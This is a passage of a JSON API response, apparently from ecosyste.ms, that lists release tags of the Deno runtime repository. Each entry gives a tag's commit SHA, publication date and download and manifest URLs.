ependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms